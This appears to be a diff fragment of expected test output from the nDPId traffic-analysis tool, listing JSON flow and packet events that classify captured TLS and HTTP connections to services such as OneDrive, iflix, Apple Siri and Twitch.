-01315{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":484,"source":"sites.pcapng","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1646495710343,"flow_last_seen":1646495710415,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":6356,"flow_avg_l4_payload_len":908,"midstream":0,"thread_ts_msec":1646495710415,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"13.81.118.91","src_port":33102,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"onedrive.com","server_names":"onedrive.com,p.sfx.ms,*.live.com,*.live.net,*.skydrive.live.com,*.onedrive.live.com,*.onedrive.com,d.sfx-df.ms,*.odwebb.svc.ms,*.odwebp.svc.ms,*.odwebdf.svc.ms,*.odwebpl.svc.ms","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"67bfe5d15ae567fb35fd7837f0116eec","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, O=Microsoft Corporation, CN=Microsoft RSA TLS CA 01","subjectDN":"CN=onedrive.com","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2","fingerprint":"50:2F:33:10:92:AC:27:7B:17:BE:82:68:3B:E2:29:AD:97:41:B7:BB"}} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":487,"source":"sites.pcapng","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1646495710534,"flow_last_seen":1646495710534,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1646495710534,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"13.107.42.13","src_port":56836,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":487,"source":"sites.pcapng","alias":"nDPId-test","flow_id":42,"flow_packet_id":1,"flow_last_seen":1646495710534,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646495710534,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8CqVAAEAGNnfAqAGADWsqDd4EAbvOscftAAAAAKAC+vD21AAAAgQFtAQCCArXIg8YAAAAAAEDAwc="} -00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":488,"source":"sites.pcapng","alias":"nDPId-test","flow_id":42,"flow_packet_id":2,"flow_last_seen":1646495710555,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1646495710555,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA0VKNAAHUGt4ANayoNwKgBgAG73gT+RZAmzrHH7oAS\/\/9wpwAAAgQFoAEDAwgBAQQC"} -01151{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":489,"source":"sites.pcapng","alias":"nDPId-test","flow_id":42,"flow_packet_id":3,"flow_last_seen":1646495710557,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":571,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":571,"pkt_l4_len":537,"thread_ts_msec":1646495710557,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAItCqdAAEAGNITAqAGADWsqDd4EAbvOscfu\/kWQJ1AYAfaM8QAAFgMBAgABAAH8AwNoOd\/HU8dseMv53a0gjDg57feHmv3ZKYt3PSUCEOAz7yDC+9qh9Lsnn2pjQO0NmdEK9+51DwzlDpkQTXJ0hGSXhgAiEwETAxMCwCvAL8ypzKjALMAwwArACcATwBQAnACdAC8ANQEAAZEAAAAWABQAABFvbmVkcml2ZS5saXZlLmNvbQAXAAD\/AQABAAAKAA4ADAAdABcAGAAZAQABAQALAAIBAAAjAAAAEAAOAAwCaDIIaHR0cC8xLjEABQAFAQAAAAAAIgAKAAgEAwUDBgMCAwAzAGsAaQAdACAI7FYCMeLngdMxbkPLy3IoQelSFCsyCvetq1oFf6z+UQAXAEEEWlI8xcTn+Mao6N7i2Le6X1KJI9pYZKIE\/2dqJMzsIrHC0C7HZlpYDP5BCM3Qrb983QL8azL17uscE+MtJARpvAArAAUEAwQDAwANABgAFgQDBQMGAwgECAUIBgQBBQEGAQIDAgEALQACAQEAHAACQAEAFQCFAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} -00901{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":489,"source":"sites.pcapng","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646495710534,"flow_last_seen":1646495710557,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1646495710557,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"13.107.42.13","src_port":56836,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.MS_OneDrive","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"onedrive.live.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -01328{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":494,"source":"sites.pcapng","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1646495710534,"flow_last_seen":1646495710577,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":6361,"flow_avg_l4_payload_len":795,"midstream":0,"thread_ts_msec":1646495710577,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"13.107.42.13","src_port":56836,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.MS_OneDrive","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"onedrive.live.com","server_names":"onedrive.com,p.sfx.ms,*.live.com,*.live.net,*.skydrive.live.com,*.onedrive.live.com,*.onedrive.com,d.sfx-df.ms,*.odwebb.svc.ms,*.odwebp.svc.ms,*.odwebdf.svc.ms,*.odwebpl.svc.ms","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"a66ea560599a2f5c89eec8c3a0d69cee","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, O=Microsoft Corporation, CN=Microsoft RSA TLS CA 02","subjectDN":"CN=onedrive.com","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2","fingerprint":"77:7F:F2:95:29:A7:E3:CC:0F:BF:2F:BA:2E:6F:2A:38:62:8B:48:4D"}} -00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":497,"source":"sites.pcapng","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1646495749875,"flow_last_seen":1646495749875,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1646495749875,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"129.226.107.210","src_port":45014,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":497,"source":"sites.pcapng","alias":"nDPId-test","flow_id":43,"flow_packet_id":1,"flow_last_seen":1646495749875,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646495749875,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8bgJAAEAGHN3AqAGAgeJr0q\/WAbvpKcA1AAAAAKAC+vDq5gAAAgQFtAQCCAoyACVaAAAAAAEDAwc="} -00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":498,"source":"sites.pcapng","alias":"nDPId-test","flow_id":43,"flow_packet_id":2,"flow_last_seen":1646495750196,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1646495750196,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA0AABAAC8Gm+eB4mvSwKgBgAG7r9bNFCqu6SnANoASOQgzewAAAgQFoAEBBAIBAwMH"} -01153{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":499,"source":"sites.pcapng","alias":"nDPId-test","flow_id":43,"flow_packet_id":3,"flow_last_seen":1646495750202,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":571,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":571,"pkt_l4_len":537,"thread_ts_msec":1646495750202,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAItbgRAAEAGGurAqAGAgeJr0q\/WAbvpKcA2zRQqr1AYAfYZ+QAAFgMBAgABAAH8AwMSMXO4WcNq177CYxST5Cayi57AGXeQdEMNPed0f\/vO+CBsnRDIIeROJeOlCByvk7lr9pRUbeR06Cs4dVzQT0oYEAAiEwETAxMCwCvAL8ypzKjALMAwwArACcATwBQAnACdAC8ANQEAAZEAAAASABAAAA13d3cuaWZsaXguY29tABcAAP8BAAEAAAoADgAMAB0AFwAYABkBAAEBAAsAAgEAACMAAAAQAA4ADAJoMghodHRwLzEuMQAFAAUBAAAAAAAiAAoACAQDBQMGAwIDADMAawBpAB0AIOmUL4m7jSQuaHGCv6++\/yOU0VJCaPyexIMcIsguXG5nABcAQQTHBHql0\/iCD7AqH7jE0qyA2MF\/+\/iD9HNmfv2msqiXNFGoZilNx52dlYpSngcjMahYCZatuJxecuXUWxhAYPfzACsABQQDBAMDAA0AGAAWBAMFAwYDCAQIBQgGBAEFAQYBAgMCAQAtAAIBAQAcAAJAAQAVAIkAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} -00887{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":499,"source":"sites.pcapng","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646495749875,"flow_last_seen":1646495750202,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1646495750202,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"129.226.107.210","src_port":45014,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.IFLIX","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iflix.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00943{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":500,"source":"sites.pcapng","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1646495749875,"flow_last_seen":1646495750523,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1432,"flow_tot_l4_payload_len":1949,"flow_avg_l4_payload_len":487,"midstream":0,"thread_ts_msec":1646495750523,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"129.226.107.210","src_port":45014,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.IFLIX","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iflix.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"00447ab319e9d94ba2b4c1248e155917","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -01507{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":502,"source":"sites.pcapng","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1646495749875,"flow_last_seen":1646495750523,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1432,"flow_tot_l4_payload_len":4189,"flow_avg_l4_payload_len":698,"midstream":0,"thread_ts_msec":1646495750523,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"129.226.107.210","src_port":45014,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.IFLIX","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iflix.com","server_names":"jan18-2022-1.ias.iflix.com,access.iflix.com,accounts.iflix.com,debugaccess.iflix.com,hwvip.iflix.com,iflix.com,live.iflix.com,pbaccess.iflix.com,pbdebugaccess.iflix.com,test.iflix.com,testupload.iflix.com,tv.iflix.com,upload.iflix.com,vplay.iflix.com,www.iflix.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"00447ab319e9d94ba2b4c1248e155917","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert Secure Site CN CA G3","subjectDN":"C=CN, ST=Guangdong Province, L=Shenzhen, O=Shenzhen Tencent Computer Systems Company Limited, CN=jan18-2022-1.ias.iflix.com","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2","fingerprint":"6F:FD:C1:38:F4:2A:0B:65:51:9C:0E:11:86:63:B5:58:52:FC:96:B0"}} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":458,"source":"sites.pcapng","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1646495488872,"flow_last_seen":1646495488872,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1646495488872,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"15.160.39.187","src_port":45898,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":458,"source":"sites.pcapng","alias":"nDPId-test","flow_id":37,"flow_packet_id":1,"flow_last_seen":1646495488872,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646495488872,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8\/MhAAEAGRHDAqAGAD6Anu7NKAbvmP22QAAAAAKAC+vBpUQAAAgQFtAQCCAoE\/txmAAAAAAEDAwc="} +00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":459,"source":"sites.pcapng","alias":"nDPId-test","flow_id":37,"flow_packet_id":2,"flow_last_seen":1646495488880,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646495488880,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA8AABAADIGTzkPoCe7wKgBgAG7s0optQbo5j9tkaAS9LPzBQAAAgQFtAQCCAoEQEeaBP7cZgEDAwc="} +01169{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":460,"source":"sites.pcapng","alias":"nDPId-test","flow_id":37,"flow_packet_id":3,"flow_last_seen":1646495488882,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":583,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":583,"pkt_l4_len":549,"thread_ts_msec":1646495488882,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAI5\/MpAAEAGQnHAqAGAD6Anu7NKAbvmP22RKbUG6YAYAfaZtgAAAQEICgT+3HEEQEeaFgMBAgABAAH8AwO25geT89HZVQIHdAvPqVcdroWBp1YfQbaMJ\/IT9jA01iAQ9v2Qg1QtgoSL\/wrZgtn2pCmqUafGB71JcGJ1a5vPpQAiEwETAxMCwCvAL8ypzKjALMAwwArACcATwBQAnACdAC8ANQEAAZEAAAAWABQAABFndXp6b25pLmFwcGxlLmNvbQAXAAD\/AQABAAAKAA4ADAAdABcAGAAZAQABAQALAAIBAAAjAAAAEAAOAAwCaDIIaHR0cC8xLjEABQAFAQAAAAAAIgAKAAgEAwUDBgMCAwAzAGsAaQAdACAfoSMbRE149N9PW6YpT\/B1gLVQ\/izORnimYk5vzkOPIwAXAEEEYgA3US97mm0LBVaj+yl1ih4nt3Ma4wqV+qwTQtcgUnIu95ynuvYl8aODuWCNRrQ8KDDItT25yW1YelOufG9kvAArAAUEAwQDAwANABgAFgQDBQMGAwgECAUIBgQBBQEGAQIDAgEALQACAQEAHAACQAEAFQCFAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} +00908{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":460,"source":"sites.pcapng","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646495488872,"flow_last_seen":1646495488882,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1646495488882,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"15.160.39.187","src_port":45898,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleSiri","breed":"Acceptable","category":"VirtAssistant"},"tls": {"version":"TLSv1.2","client_requested_server_name":"guzzoni.apple.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00949{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":461,"source":"sites.pcapng","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1646495488872,"flow_last_seen":1646495488890,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":491,"midstream":0,"thread_ts_msec":1646495488890,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"15.160.39.187","src_port":45898,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleSiri","breed":"Acceptable","category":"VirtAssistant"},"tls": {"version":"TLSv1.3","client_requested_server_name":"guzzoni.apple.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":462,"source":"sites.pcapng","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1646482791144,"flow_last_seen":1646482791191,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":491,"midstream":0,"thread_ts_msec":1646495488890,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"95.101.195.214","src_port":51432,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Hulu","breed":"Fun","category":"Streaming"}} +00665{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":462,"source":"sites.pcapng","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1646482801387,"flow_last_seen":1646482801394,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1646495488890,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"34.96.123.111","src_port":44954,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"HTTP.GoogleCloud","breed":"Acceptable","category":"Cloud"},"http": {}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":462,"source":"sites.pcapng","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1646482801387,"flow_last_seen":1646482801394,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1646495488890,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"34.96.123.111","src_port":44954,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00665{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":462,"source":"sites.pcapng","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1646482825245,"flow_last_seen":1646482890325,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1646495488890,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"69.191.252.15","src_port":39036,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"HTTP.Bloomberg","breed":"Acceptable","category":"Network"},"http": {}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":462,"source":"sites.pcapng","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1646482825245,"flow_last_seen":1646482890325,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1646495488890,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"69.191.252.15","src_port":39036,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":462,"source":"sites.pcapng","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1646482623895,"flow_last_seen":1646482623982,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1380,"flow_tot_l4_payload_len":1897,"flow_avg_l4_payload_len":474,"midstream":0,"thread_ts_msec":1646495488890,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"31.222.67.112","src_port":35054,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Badoo","breed":"Fun","category":"SocialNetwork"}} +00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":462,"source":"sites.pcapng","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1646482844787,"flow_last_seen":1646482844825,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1340,"flow_tot_l4_payload_len":5346,"flow_avg_l4_payload_len":594,"midstream":0,"thread_ts_msec":1646495488890,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"151.101.193.73","src_port":43412,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Bloomberg","breed":"Acceptable","category":"Cloud"}} +00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":462,"source":"sites.pcapng","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1646482646628,"flow_last_seen":1646482646693,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":5845,"flow_avg_l4_payload_len":649,"midstream":0,"thread_ts_msec":1646495488890,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"2.17.141.128","src_port":42580,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Activision","breed":"Fun","category":"Game"}} +00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":462,"source":"sites.pcapng","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1646482659915,"flow_last_seen":1646482659961,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1340,"flow_tot_l4_payload_len":1857,"flow_avg_l4_payload_len":464,"midstream":0,"thread_ts_msec":1646495488890,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"146.75.62.167","src_port":46084,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Twitch","breed":"Fun","category":"Video"}} +00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":462,"source":"sites.pcapng","alias":"nDPId-test","flow_id":31,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1646482879964,"flow_last_seen":1646482879998,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":491,"midstream":0,"thread_ts_msec":1646495488890,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"23.51.246.65","src_port":46264,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Playstation","breed":"Fun","category":"Game"}} +00653{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":462,"source":"sites.pcapng","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1646482686914,"flow_last_seen":1646482687080,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1646495488890,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"208.85.40.158","src_port":45936,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":462,"source":"sites.pcapng","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1646482686914,"flow_last_seen":1646482687080,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1646495488890,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"208.85.40.158","src_port":45936,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 